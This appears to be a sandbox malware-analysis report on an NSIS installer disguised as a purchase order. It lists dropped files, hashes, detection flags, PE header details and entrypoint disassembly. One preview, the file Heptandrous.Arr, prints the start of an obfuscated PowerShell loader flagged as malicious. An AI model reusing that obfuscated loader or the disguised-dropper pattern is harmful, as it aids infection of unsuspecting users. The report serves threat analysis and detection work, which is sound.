              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.7.6.<./.P.i.

              C:\ProgramData\Microsoft\Windows\WER\Temp\WER304E.tmp.xml

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4787
              Entropy (8bit):4.517175852646517
              Encrypted:false
              SSDEEP:48:cvIwwtl8zsve702I7VFJ5WS2Cfjk/ms3rm8M4Ju/OqFN+q8gbOhRTeLKVEVld:uILfG7GySPfC5JQJTgeLQEVld
              MD5:1C1DE4679B9F2733347EC9B13012B608
              SHA1:E54AA1E50B39873EE8C130DF6D4E89ACF12E0F9D
              SHA-256:2C10C48FA6B9F4700A2528A3D2B4B31023B3909E9455A2BBA3BB55AD2BB42545
              SHA-512:C2072F552FDC59EFFF3C15B10AD96BD8DE7A95DEF17694D869EB710CFDAA012923A2B584AED0993555D2A454B62C200DAB2F0CCAD1659EDE15BB6985051D3B8B
              Malicious:false
              Reputation:low
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222772268" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:modified
              Size (bytes):8003
              Entropy (8bit):4.840877972214509
              Encrypted:false
              SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
              MD5:106D01F562D751E62B702803895E93E0
              SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
              SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
              SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

              C:\Users\user\AppData\Local\Temp\Sammentrykket.exe

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Category:dropped
              Size (bytes):876348
              Entropy (8bit):6.160427481450352
              Encrypted:false
              SSDEEP:12288:R3IpD7+TUoYhjjPDU6dK7UVEnNH8nUg1EbV3O9XqOqLI4VpStZB:R3IUwHhjjPVdK7UVEp8nU6C2qOaUB
              MD5:D332BCAA3C61494B774F49BF3E716C21
              SHA1:8CDFA60C6B3F25C7D48753E50C298B746C3386DE
              SHA-256:D61208C85CE83C279DD87495F0DFC1CF5C345D2BF3A6E739279DCF188E19B21D
              SHA-512:40A405252934E0ECE7E24514BF041674C84559D94F0791183C77268E154387AC8C452838237C33F55434A3EB04C8F47E818F9D7172CC5295EF9AF86E92F80942
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 29%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L...h.Oa.................h....:......5............@...........................C...........@..........................................P<..@...........................................................................................................text...pf.......h.................. ..`.rdata...............l..............@..@.data...x.9.........................@....ndata........:..........................rsrc....@...P<..B..................@..@................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Sammentrykket.exe:Zone.Identifier

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Preview:[ZoneTransfer]....ZoneId=0

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ig332v4d.ytz.ps1

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_siybcszv.ei5.psm1

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Biteless96.Arb16

              Download File
              Process:C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe
              File Type:data
              Category:dropped
              Size (bytes):362225
              Entropy (8bit):7.73594534052683
              Encrypted:false
              SSDEEP:6144:c4fCYSs/2+k9xzT7FIAkPDqKvjt4TWP13IljMnnp6BtKovoApMpuT7p3ocVV:XgbznSdus+OIl6n0BtKogApMkT7pnV
              MD5:BD9481DFBA36E80E3106B60BDE4E13D4
              SHA1:A313DBA340750E640CB618F6E867C9B1760C3AE3
              SHA-256:CC344F3AC0C321E5EF6178667B2639EE83331ACD77A77D2D9792F00590E24C5B
              SHA-512:F1F418B79A6F24A062CF6710EC801CADAD5FAA826F393BEC9B90E91FFE6E44E2C06A4CA3101FF3B69BE9FE1442B0B4ED1A57C2FFA0FD6BA5FC3B94CECA14E363
              Malicious:false
              Preview:.........................tt.XXXXX....i.^.....\\...................}.........zzz..............uu..............{{............gg..''..................W...........5555..............JJJJ............E.............44..........FF..................................~~~.. ............''''......................@@..J....VVV....FF.|...M......O..cccc..................===...................~~.6...[..............................................-............7....i...,........4.........................................\.).UUUUU......./.........W....''........sss................q............J........FFF..............s.^..............##....^......................L............................,.................k............................... .&..........................hh.....kk.........4.).........V...........m.......M..@.FF...........QQ................:.............XX..........Y..............--..........=..}}}}......................ddd.l...<......./////.......SSSSS..........JJJJ......44....sssss...........

              C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Deracinated215.ban

              Download File
              Process:C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe
              File Type:data
              Category:dropped
              Size (bytes):8063
              Entropy (8bit):4.898953775891207
              Encrypted:false
              SSDEEP:192:6Ua/xFXnmw2LeONEvvX/lkyRNcbsI1r+SKIxJV:FaZF3mw2SOqX7RNcbNUSKi
              MD5:462D92BFCEE44C020E882B3F4B66103D
              SHA1:0E1CA37EE507ECB03CBEE900435ED253FD73539A
              SHA-256:59710C9794FA3E4454960EE892E767414D4A26A009B4B27497DE25F91DCCE891
              SHA-512:478254CA1FD8F09DDC7BD64FD17FBFA259667F9C479E3AF94D3FD3D907B967FA31F22FED568ADFD052BBD8AF2C9EEF100D38E0E6AC3079203B2AF6066CED7CF6
              Malicious:false
              Preview:....^g...q...+...j...:.......X.`...........D.SP......-..k.....x.e...p.Z......^.............L...S.......5.v...6.......q.G.........T.b....L.9.+0..|..........................1...............h...&...<...@U..`....Hy...J...j..l.W.:..............M.............}..I.......|..)....'.m.q..e...i...7....v.........+B;..m......c......................`...zO..............n...............)..Q......y........K.o....t3_..U...G..8....9....W...y...4..../...... ].U.....%..0.|.......p..R.9JM..b.............F........'....Y...B...............b#....e._*.....k.>...x.....................M...g..............S..............Z...H..F_!..;.........y...r.....:....Ay.-.}U..H..................VdX..7x.z....V..n.1....H..6..............|......D....c.....:.3.......................G......%.i....G..9..w..p..............qK...._......V.N........:..).a.<.../...............d.t................>.................u:..>.....m.......n.k....................W...........6....6...........|.4`..a........6............-m............

              C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Frankincensed.txt

              Download File
              Process:C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):426
              Entropy (8bit):4.234228654602146
              Encrypted:false
              SSDEEP:12:vWXZ1X/FWUbJLCtXGDoVn39MXF0ZJM9m5Qp19bBn:vC1vFb8kDoFID9mar9bB
              MD5:8719B83341B7CB79BAF1ACDD7C9F87E7
              SHA1:D83B011736A19BBB94DFC7CCBE0A467FC0CA11CD
              SHA-256:09B74E6AD781A94D787A71169BA8FF7B2F6878AEF837500A1A5C8C49FE6EDAB9
              SHA-512:C37F6E4FCEA813C4A0915B4CD7EE1DDFD1AF7A7E1024E27D81C3F3B0730EC68F082D08117098B988B142F6E7683BE60E3972965F34A1230F80D84636C1B9F60A
              Malicious:false
              Preview:stvregnet nitzhe rivalinden.sophism demarcated telegraphers mariposas unevasiveness spheration universalist forblffelsen martnet..blunket mimer tpper antigene projekterings erasing calyptrogen cirsectomies nondeterminism dasiphora..fngselsvsenernes asjas formulistic ctenodipterini newel annotating,malplaceres metamerized inrighted semiplumaceous accipient customed regionaliserende.nomopelmous rhagiocrin nskebarn brndoffer,

              C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Heptandrous.Arr

              Download File
              Process:C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe
              File Type:ASCII text, with very long lines (51991), with no line terminators
              Category:dropped
              Size (bytes):51991
              Entropy (8bit):5.3823418456115
              Encrypted:false
              SSDEEP:1536:+jqyk5qHicBZSSgoYpRKB0z07MugCVZ1piAQ:+jq5qPBEogEw0pL7FQ
              MD5:29746F3C54388A9F4917E4BE34F35B22
              SHA1:1C8099CED377BCCBA4F56B6E946993BD3F9E8174
              SHA-256:4CAA1D9B0C1A2A8C5B4357ED868A0B15CAAB2769EF85D72448A602E55DE57358
              SHA-512:A02DF71E19AFB0E790B5CD28FB2CC0622236AA3F30CA52D02B73028985DF4B4560EEB91FDCA54B80DF23114751DC121348C1D18DB61A053D36C7FBE3D0B2AF40
              Malicious:true
              Preview:$Shammosim=$Udst;<#Lise Yardwand Afkalds Uforanderlighed Elgkernes dimensionerendes #><#Maksimerer Gasslangen Texturing Rupie Dateline Burdensome Tossing #><#Ufleksible Phenomenism Retruse Saften #><#Heliotropical Welwitschia Fornuftgteskaber Outfall #><#Reformulating Nonoptical Undervisningstrinenes dumpoke Descendibility unroyally #><#Dioxinforurenet Svamperummet stubbornness Infamise Unsynchronous Anticipationen #>$Lustering = "Ve,te;,uusb`$ De uODag.rv AniteProjerO.tpolufo,egTharmg Ashie AngrtNsevrsUns b= Vive`$DetalSAntigyCata,gArenae ltinpO dbolUlvere Deb,j ProbeOvercsMo opk KrypoSkjorlNo coeForsrrAntiknFaraoeMissesS.edr;ValraF Reg uProponSidescNaivitRiftiiAnalyo Far,nSkyld OpsumAUventmTannkp UnavyMellexSchooe MorpsLeish Over(mon,r`$Selv,LHie,oeDonergAbor,ePreadmCade.uSuperlR ilbiReg ng,mvekhLsevaeMikrodViride CoatrRade , Spli Skin`$S.ligVAvlskr tetriPe,erkHove n Dropi Te tnSan,fg DisteMou.in IdylsEr,nt Milit=Regio Frems0Decom)borge{Sha,p. Hogc`$reasoG ,erreU,oedaOptegsExulct a

              C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Laminas\decasualized.nie

              Download File
              Process:C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe
              File Type:data
              Category:dropped
              Size (bytes):1598
              Entropy (8bit):4.843429292405709
              Encrypted:false
              SSDEEP:48:1gSbt8NWQp0dLJtexdI6NqPR/VulPF9ZQF:1gtBp0dLCdIPRNulaF
              MD5:A79D55288CA8FC36F756CA2DF78DF7AF
              SHA1:3482E99E8DEE331B3A130CBF0A6120B48FE36BAF
              SHA-256:DF8B4D40703F1C07330641C11C9B89E4F92C51D8A87710C2BCDA193400899E17
              SHA-512:21A0D3EC4785C566D45B9140BD38B71B0FD1A883F48AE065DD57ECA54EFA418054301C2E00545DE324B1799BF1AA3AFFBCDB597498C4DF7AFEBF00E933BD4AF5
              Malicious:false
              Preview:.c../.I......N......j....}.N....O......@5.r....k..5../...<....G....d..............G......1.T................u..........-A*..l.............................J..s....[.%R 3l.........Y-.....O...>....5._....].......4.S................&.F......s..............uK..1.......g..L...0....5}..................}....z^...L.O....o...t..2.7..............{f6....!....Z......................c}................r|................4...........2..q..........~.V....t...%........t.h...5........DL.......w4......m............k.;GY...J..........<..Q......l..'....Z..&.......x.x9........7....O............?....I.......B.K..6...............#.......[.....8.......L..6.......'.$....5.[G.....Y.._f..s.....2y...J.C.NX.....1...6....q......td.9.....9....x........D.`,.....{......e......X....H...~...5.......!...._.w..9.=d.........).............~..............>.....A..y................}q........Y.......2....W.....e ...Z..........9...{P..SY.......f..3...K...A..........p....>..w.}...~..0....F.........e....g....U.........;..x...

              C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Laminas\satsbilleder.min

              Download File
              Process:C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe
              File Type:data
              Category:dropped
              Size (bytes):4569
              Entropy (8bit):4.827413411790206
              Encrypted:false
              SSDEEP:96:E52t34LUMB6hUmRFoiL1rEZnfCxuv24pyrPxVR:E52t3yrqUmRFoqdUKuvDpuPxH
              MD5:ACB120BA86F44EC0FA1E60BFCFCFE5C5
              SHA1:3F470AD1363BD721BDA6AF4C79A34CD8A5E94EC1
              SHA-256:7AD2307792118779A5F40C39D2F3047A4D3C0B71FF9E2EA06D2AE124CFF86F86
              SHA-512:1D46B84D9A5E3B5261B093084193A06DAB792E9EEEA18DDD5B7548D74F470C8C13548BDC02FE75937BB8CF83860A217A301DC259D08A7583A28BED5CDDCAF69A
              Malicious:false
              Preview:..M..................*........d....[..D......y.........W...G......................}.......G............`....Sz....k............~R.....................)...%.....Q.......i........M......T.&...+..Q.....5.............S...-;.l..L.4.................v...........B._.....!|.............)...........................5..F...O......).....x...........`.....M..............]..R....T......#........I..............<..O.{y..........F.......y......|.._w..........HT.........SY..........q.AH...............G.%-..........j...e....u...T............w.........K..G..d..<........Gx..@..\p.....M..!....;....)............Q^..............&P.<.I5.{......@......+P...d.................-....8...............U..!.<........m..F.......b...........'......(.$.......q3Z......B...).....[B.......5a........W.......S....o.....}U.........\....i.........@(.../..6..e..P.g....=.).......q...(F....g.,.'....."C..*..................#.k.P...4.%.......(....S.(h.........z....................<................p?..........<...z.....

              C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Laminas\sharins.dri

              Download File
              Process:C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe
              File Type:TTComp archive data, binary, 4K dictionary
              Category:dropped
              Size (bytes):3873
              Entropy (8bit):4.818261380685794
              Encrypted:false
              SSDEEP:96:NQ+UMIGKiEZMWngpnQX311LVUomcVbmX8Rm:NQRxGdrnQX311edcVa8Rm
              MD5:CBE5F7B0FB52E89B173DEF4DA182E007
              SHA1:1D1ECDB560A6542425A0C0F216520BFC3C54E898
              SHA-256:9D4441F5001396DD8782FB3D760DE020387DA0F89BE435194B322229FC2162BC
              SHA-512:890976074F894804808E906DCCFA027CA7F1940100C3168A559A8C2EB277DA6A5FCDAB3201757B8F20F89BDB892C0F71BA9EFD6EC40B42D2C060611216C4D738
              Malicious:false
              Preview:........`......eL....l.......G...........#."................J...............R....Z.V..?[i..D...@..g.N.........@....................x..............!.........P...........j.......e....%V...h...|....#....j...8......y.......Pd..>.\..5..`j.G............N..........F.p...............V.f........Q..@......zJ Y.....1`.....A..................2....+..".......ki......nB......_.......h.c..**......=..........l.Q.$4.........m.....T....V...t...<Z.....).2...W7R>......f.......(.0.J....tA.{........Yl...k.......................!.As...@w...........rO..E..........K.+........55...\....fC}H...3...........!.....2...'.:..W..)...........'/.+....B......c....[..)..h..W.C..................../........Ts..b.d.r.....CT.........@..../.7Y.L........-......b.v..d.....s...........h...^......................\......./....K...N.....f..S......T....................oi...p.[.b....h...........f...........&........oQ.>...;.......p.....-...0`;.Z.B.K.M..z..Ai.....`..Q.m......\.A.........4......W..2....&.............g&.

              C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Laminas\tepottes.non

              Download File
              Process:C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe
              File Type:data
              Category:dropped
              Size (bytes):5746
              Entropy (8bit):4.860343313702358
              Encrypted:false
              SSDEEP:96:WC1MtbM/mkZAIw2KMyWFtyiLD8bqMuYFMv3zJQ533TeMWZceVpY:WCabM/mkbKmty2D82SFj5HTeMWTTY
              MD5:F70A8CDCEFEBCC012F6586FCE4610BC8
              SHA1:A51720E46071D068F04761363B6D26D3F79B08D8
              SHA-256:F4C59E08F2ED7D49DA8FFA4726D2823E16513A946F623E3240D190BFE755F541
              SHA-512:4428AE31A366B4E615DE842EA34824632A023B891FE202323A99E9472EF2B8E9FEBA6B19467845BA070BE2CF54F03C2772D938EDD92E85740971A8DB8E040A41
              Malicious:false
              Preview:..1...........U...L...}.......f.....V.X....U..........U'...B.`.........!.....B.....eu...............W...(..........!.........g........................:.....'.R...&..Z..9B...............`.........../....!....B.+.....^.4.....0......h.....C........{.._.w....................#...;...Q...M.....L.........7...............................U.....J..%.....M.........Nt..#............T...VR..^. H..p....4.........c.H7.................C.....N......<..,..r...)....{...C...........)z..B........i.H...........".....m.Y..h...F...|.......0R..).....^.c...!.N....#....}.._)...c.>.._.............+..J.....C......x..%...\..x........Zk....%..#..U..................................'....f...<..................S..5....Q~.............>. ;.T.2&...............]...r.........k..................f.a..Lt...=.........I.X....c...^.............kv.....a"...,....d......&.../.... ..e....@........,p.........U.....t..i....m..................]-......R9.~k..>......9=.)B..#..................p.....i........+.......&.......

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):6.160427481450352
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:PO Tournefortian2453525525235235623425523235.exe
              File size:876'348 bytes
              MD5:d332bcaa3c61494b774f49bf3e716c21
              SHA1:8cdfa60c6b3f25c7d48753e50c298b746c3386de
              SHA256:d61208c85ce83c279dd87495f0dfc1cf5c345d2bf3a6e739279dcf188e19b21d
              SHA512:40a405252934e0ece7e24514bf041674c84559d94f0791183c77268e154387ac8c452838237c33f55434a3eb04c8f47e818f9d7172cc5295ef9af86e92f80942
              SSDEEP:12288:R3IpD7+TUoYhjjPDU6dK7UVEnNH8nUg1EbV3O9XqOqLI4VpStZB:R3IUwHhjjPVdK7UVEp8nU6C2qOaUB
              TLSH:A615E1A7B91098D0EC29CD728A5FB57406297C27094B964B70A8F70E6FB13036B17DF6
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L...h.Oa.................h....:....

              File Icon

              Icon Hash:060037645d190103

              Static PE Info

              General

              Entrypoint:0x40350a
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x614F9A68 [Sat Sep 25 21:53:44 2021 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6

              Entrypoint Preview

              Instruction
              push ebp
              mov ebp, esp
              sub esp, 000003F4h
              push ebx
              push esi
              push edi
              push 00000020h
              pop edi
              xor ebx, ebx
              push 00008001h
              mov dword ptr [ebp-14h], ebx
              mov dword ptr [ebp-04h], 0040A2E0h
              mov dword ptr [ebp-10h], ebx
              call dword ptr [004080CCh]
              mov esi, dword ptr [004080D0h]
              lea eax, dword ptr [ebp-00000140h]
              push eax
              mov dword ptr [ebp-0000012Ch], ebx
              mov dword ptr [ebp-2Ch], ebx
              mov dword ptr [ebp-28h], ebx
              mov dword ptr [ebp-00000140h], 0000011Ch
              call esi
              test eax, eax
              jne 00007FB6D4B0CA4Ah
              lea eax, dword ptr [ebp-00000140h]
              mov dword ptr [ebp-00000140h], 00000114h
              push eax
              call esi
              mov ax, word ptr [ebp-0000012Ch]
              mov ecx, dword ptr [ebp-00000112h]
              sub ax, 00000053h
              add ecx, FFFFFFD0h
              neg ax
              sbb eax, eax
              mov byte ptr [ebp-26h], 00000004h
              not eax
              and eax, ecx
              mov word ptr [ebp-2Ch], ax
              cmp dword ptr [ebp-0000013Ch], 0Ah
              jnc 00007FB6D4B0CA1Ah
              and word ptr [ebp-00000132h], 0000h
              mov eax, dword ptr [ebp-00000134h]
              movzx ecx, byte ptr [ebp-00000138h]
              mov dword ptr [007A8B18h], eax
              xor eax, eax
              mov ah, byte ptr [ebp-0000013Ch]
              movzx eax, ax
              or eax, ecx
              xor ecx, ecx
              mov ch, byte ptr [ebp-2Ch]
              movzx ecx, cx
              shl eax, 10h
              or eax, ecx

              Rich Headers

              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c50000x74090.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x66700x6800947cb8a43bf8f4be84b88dc77764312eFalse0.6679311899038461data6.436002641218711IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x80000x139a0x1400691f0273dad50ec603f6fedf850b58eeFalse0.45data5.145774564074664IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0xa0000x39eb780x60069d435a1d4e9efa1d5d00d6c3645c91eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .ndata0x3a90000x1c0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x3c50000x740900x742008811d5f7795ce1cbd4cc3ae013339193False0.31199332279332614data3.904771356500897IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_ICON0x3c55980x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.26142852915939285
              RT_ICON0x4075c00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.32470720454276586
              RT_ICON0x417de80x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.3789415598066008
              RT_ICON0x4212900x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishUnited States0.38169172932330825
              RT_ICON0x427a780x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.4024029574861368
              RT_ICON0x42cf000x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.39891355692017005
              RT_ICON0x4311280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.45736514522821575
              RT_ICON0x4336d00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5044559099437148
              RT_ICON0x4347780xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5381130063965884
              RT_ICON0x4356200x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5717213114754098
              RT_ICON0x435fa80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6872743682310469
